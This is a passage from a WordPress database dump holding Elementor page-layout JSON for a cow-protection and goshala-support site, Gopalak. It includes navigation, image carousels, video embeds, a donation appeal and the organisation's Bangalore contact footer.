"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11516,1914,'_elementor_page_assets','a:0:{}'),(11517,1915,'_elementor_edit_mode','builder'),(11518,1915,'_elementor_template_type','wp-page'),(11519,1915,'_elementor_version','3.7.8'),(11520,1915,'_wp_page_template','elementor_canvas'),(11521,1915,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11522,1915,'_elementor_page_assets','a:0:{}'),(11523,1916,'_elementor_edit_mode','builder'),(11524,1916,'_elementor_template_type','wp-page'),(11525,1916,'_elementor_version','3.7.8'),(11526,1916,'_wp_page_template','elementor_canvas'),(11527,1916,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\